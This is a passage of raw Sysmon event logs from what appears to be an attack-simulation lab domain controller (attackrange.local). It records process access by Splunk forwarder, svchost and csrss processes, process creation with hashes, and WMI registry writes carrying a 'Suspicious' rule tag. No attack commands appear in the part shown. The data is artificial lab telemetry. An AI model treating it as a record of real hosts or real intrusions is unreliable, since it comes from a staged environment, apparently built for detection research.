Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D63-5FA1-7401-000000008801}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.211{D28789B6-7D63-5FA1-7401-000000008801}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D64-5FA1-7501-000000008801}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7D64-5FA1-7501-000000008801}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.461{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D64-5FA1-7501-000000008801}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:16.462{D28789B6-7D64-5FA1-7501-000000008801}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:1982879388,HighDateTime:30841156***Binary mof compiled successfully 13241300x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:20.290{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:01.846{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 